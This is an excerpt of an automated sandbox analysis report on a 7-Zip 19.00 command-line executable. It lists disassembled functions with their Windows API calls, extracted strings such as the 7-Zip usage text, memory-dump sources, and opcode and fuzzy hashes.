                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bfaef9fa8df0d205eec04fe16e9a27ef95300a9a3da73fd13572728b12155a0b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D11AFE530055092EF24AF66E9A47987722B706BC4F048022DF4907B61DF39CEB8CB01
                                                                                                                                                                                                                                                                            Function 006A65D0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs$free
                                                                                                                                                                                                                                                                            • String ID: $ MB$ Memory =
                                                                                                                                                                                                                                                                            • API String ID: 3873070119-2616823926
                                                                                                                                                                                                                                                                            • Opcode ID: 07695d8419c59f003fa7f84926a4645375bf0ceb04becd9a3de262dbf0bc1305
                                                                                                                                                                                                                                                                            • Instruction ID: 482deb11819b59efee37330464e7cd96ecff4387744bd11923e86a6ca81acec7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07695d8419c59f003fa7f84926a4645375bf0ceb04becd9a3de262dbf0bc1305
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E1124B230090191EF10EF65E8943697332F785BE5F449222EA6E537A4DF39C966C741
                                                                                                                                                                                                                                                                            Function 006A30CC Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 32COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006A30E7
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006A3104
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006A3114
                                                                                                                                                                                                                                                                              • Part of subcall function 00662320: free.MSVCRT ref: 0066237E
                                                                                                                                                                                                                                                                              • Part of subcall function 00662320: fputs.MSVCRT ref: 006623B8
                                                                                                                                                                                                                                                                              • Part of subcall function 00662320: free.MSVCRT ref: 006623C4
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006A3132
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs$free
                                                                                                                                                                                                                                                                            • String ID: : Can not open the file as [$ERROR$Open $WARNING$] archive
                                                                                                                                                                                                                                                                            • API String ID: 3873070119-2741933734
                                                                                                                                                                                                                                                                            • Opcode ID: f32defa99fa0ddd8f5ee8d7903e4695ca461ad93e2af0abed86e02622ffafdb7
                                                                                                                                                                                                                                                                            • Instruction ID: 056ca8cbc1286da8dec9da5d97a2ee1d448c237201541c37e42c64f94f153ea6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f32defa99fa0ddd8f5ee8d7903e4695ca461ad93e2af0abed86e02622ffafdb7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BFF03CA5300D0591EF10AFA6E9A43997322B759FC4F449022DE1E533609F2DC599C341
                                                                                                                                                                                                                                                                            Function 00666F50 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 116threadCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00666F6D
                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00666F78
                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00666F85
                                                                                                                                                                                                                                                                              • Part of subcall function 0066339C: free.MSVCRT ref: 006633D7
                                                                                                                                                                                                                                                                              • Part of subcall function 0066339C: memmove.MSVCRT(00000000,?,?,00000000,006610A8), ref: 006633F2
                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00667023
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32 ref: 0066705C
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00667086
                                                                                                                                                                                                                                                                              • Part of subcall function 00666C84: CreateDirectoryW.KERNEL32 ref: 00666CA8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CountCurrentErrorLastTick$CreateDirectoryProcessThreadfreememmove
                                                                                                                                                                                                                                                                            • String ID: .tmp$d
                                                                                                                                                                                                                                                                            • API String ID: 3444860307-2797371523
                                                                                                                                                                                                                                                                            • Opcode ID: 855db8f89ad4192e1f7aaf537696d0c704f64e19782212e671a724ccd2b912be
                                                                                                                                                                                                                                                                            • Instruction ID: 5690f55d26ea62dc23d5d77a82b92c9189671bb140ff00641619edbff0a184d1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 855db8f89ad4192e1f7aaf537696d0c704f64e19782212e671a724ccd2b912be
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 403159A7318250D7DB30EF66E84079DA363B795BC8F444126EF8647720DE39C582C712
                                                                                                                                                                                                                                                                            Function 00666B2C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 87libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$AddressHandleModuleProc
                                                                                                                                                                                                                                                                            • String ID: CreateHardLinkW$kernel32.dll
                                                                                                                                                                                                                                                                            • API String ID: 399046674-294928789
                                                                                                                                                                                                                                                                            • Opcode ID: 0711bf2b160802de48a7ad8e62ea8a456af0d095c717e74070ad8e7392e23327
                                                                                                                                                                                                                                                                            • Instruction ID: 9aa7e55891e940688b60feb4e6ea54c6ffd9e85bbf307644effa1484d6dc0b45
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0711bf2b160802de48a7ad8e62ea8a456af0d095c717e74070ad8e7392e23327
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD21277331594181CFA0EB25FC613ABA312EBC37D0F442225BE9A97364DE29CC46CB04
                                                                                                                                                                                                                                                                            Function 0066DEBC Relevance: 13.9, APIs: 11, Instructions: 168COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 7aae74738ebb1fa26e9c45f1fe68a2e26c39cce5353d9637d771cf3076791eab
                                                                                                                                                                                                                                                                            • Instruction ID: aa05e525f349d7e66c6fe0cdc998e220221b77676a88291a43b84784a0ddc22f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7aae74738ebb1fa26e9c45f1fe68a2e26c39cce5353d9637d771cf3076791eab
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC51E436314A4195CB60EF25E8501AAB762FBC6BE4B480229FF5E477A4DF39C542C704
                                                                                                                                                                                                                                                                            Function 00672C58 Relevance: 13.6, APIs: 9, Instructions: 127COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 4f627721fd3f548a9e12361352d12e7f0c520e4151b4dacedd918d3c46c14af4
                                                                                                                                                                                                                                                                            • Instruction ID: 48b9c3ee3e18c5e8ab1fbd8a299e8a765b2bac034a23cd127ac23dbd4e5079c3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f627721fd3f548a9e12361352d12e7f0c520e4151b4dacedd918d3c46c14af4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE41846371498286CB70AF15D8A01ADA363FB857A4F698236FF5E27B54DB34CC82C741
                                                                                                                                                                                                                                                                            Function 00695988 Relevance: 12.7, APIs: 10, Instructions: 233COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: e1faaf7df75186d5ae884903546cdcce3f308a231f1a81c91827175cf65db9ce
                                                                                                                                                                                                                                                                            • Instruction ID: 81e0e3c7e59890048c2390bc0af2366d0dadffd519efd7e2be5b7150f3fcfff0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e1faaf7df75186d5ae884903546cdcce3f308a231f1a81c91827175cf65db9ce
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD91D072209B40C6CF51DF25E4A03AEB766F781B94F50521AEB4B47BA8DF78C885CB44
                                                                                                                                                                                                                                                                            Function 006913E8 Relevance: 12.6, APIs: 10, Instructions: 133COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: d553175bd705add0397085a2f68dee216f55efb8e0660d055bcfc610d1b73714
                                                                                                                                                                                                                                                                            • Instruction ID: 4454d4446561ca34d89de8f2edd4181152a2059bfe66ac72a6b0c19eb095a751
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d553175bd705add0397085a2f68dee216f55efb8e0660d055bcfc610d1b73714
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A514677208AD585CB60DF26E4903AEB766F78AF88F105012DF8E67B18CE39C456CB04
                                                                                                                                                                                                                                                                            Function 006916B2 Relevance: 12.6, APIs: 10, Instructions: 125COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 9943e524698941380e30c423019f5bc2cf16f063716f467c35492b6a2cf77687
                                                                                                                                                                                                                                                                            • Instruction ID: 7c243ecb68485c90a1cd95b691f78944ff9468b49b6bb9e38a8b35ffea8fae66
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9943e524698941380e30c423019f5bc2cf16f063716f467c35492b6a2cf77687
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 854109B6205F8681CF24DB26E4902AA7366F78AF84F548426DB4E57B24DF39C496C304
                                                                                                                                                                                                                                                                            Function 006A6A20 Relevance: 12.6, APIs: 10, Instructions: 59COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 49e297252a2c8ca67cda62bdf5dff8c128a9f435b231509b57c7dc761cb252a3
                                                                                                                                                                                                                                                                            • Instruction ID: d6c00a73fd22a8d4880a07eee2b3a7ae5f41952b995923dfad3c9d12a17c1983
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 49e297252a2c8ca67cda62bdf5dff8c128a9f435b231509b57c7dc761cb252a3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F112173705D8588CB91BE26DC612E8A322EB97F94F1D4179AF2D6F399DE20C8428354
                                                                                                                                                                                                                                                                            Function 0066FC9C Relevance: 12.5, APIs: 10, Instructions: 44COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memmove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1534225298-0
                                                                                                                                                                                                                                                                            • Opcode ID: 37bd50d8d1977fdd302a0b82f53c3d6d511d758968c823be9149fe37c82b5d04
                                                                                                                                                                                                                                                                            • Instruction ID: df812a1e78d941f9065078794c605384cc2fd7aa912057829428586865f245eb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37bd50d8d1977fdd302a0b82f53c3d6d511d758968c823be9149fe37c82b5d04
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B0140B3315D4292CB44EF26DD6106CB322FB87F94704416A9F2D5B7A5DF20D866C348
                                                                                                                                                                                                                                                                            Function 00696528 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 132COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID: /$\$a$z
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-3795456795
                                                                                                                                                                                                                                                                            • Opcode ID: 92741b9c6097dc57a5422346ae12ec5673efaeb8d1b2f3031f7aecb4c5395baf
                                                                                                                                                                                                                                                                            • Instruction ID: 035630cc35998bab4c3a21796afeb33b4757f04756241cbb2cabc744ad390c20
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92741b9c6097dc57a5422346ae12ec5673efaeb8d1b2f3031f7aecb4c5395baf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D41E4A260434499DF30AB21D0046F9377AF312BD4F8A4226FA4503BA4EB79C9D6D702
                                                                                                                                                                                                                                                                            Function 006A870C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21, xrefs: 006A877E
                                                                                                                                                                                                                                                                            • Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values, xrefs: 006A878E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$fputs
                                                                                                                                                                                                                                                                            • String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values
                                                                                                                                                                                                                                                                            • API String ID: 2444650769-4238946813
                                                                                                                                                                                                                                                                            • Opcode ID: 6a807e1f11532017a4cdd53ea1c09d8dec3d45ef8e00fbcf8e020d56cf8062a2
                                                                                                                                                                                                                                                                            • Instruction ID: d3e7d6f1a510fbd4970e74b8b06bb691ec9b43580abdc21f15d2de0a06634f43
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a807e1f11532017a4cdd53ea1c09d8dec3d45ef8e00fbcf8e020d56cf8062a2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7321817270568189DA70EB11F9803ADB323B786784F984425CA4E97718CF3CCC96CF44
                                                                                                                                                                                                                                                                            Function 006AE3E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                            • String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll
                                                                                                                                                                                                                                                                            • API String ID: 1646373207-4044117955
                                                                                                                                                                                                                                                                            • Opcode ID: ac966f64d20482aa4fd5c134ec705327a834465029026a46f097207993e27cb5
                                                                                                                                                                                                                                                                            • Instruction ID: abddf1ae230c4310f2ee0fc2dd5a20a3aad6556f612e5e5cc12ec20061f512bc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac966f64d20482aa4fd5c134ec705327a834465029026a46f097207993e27cb5
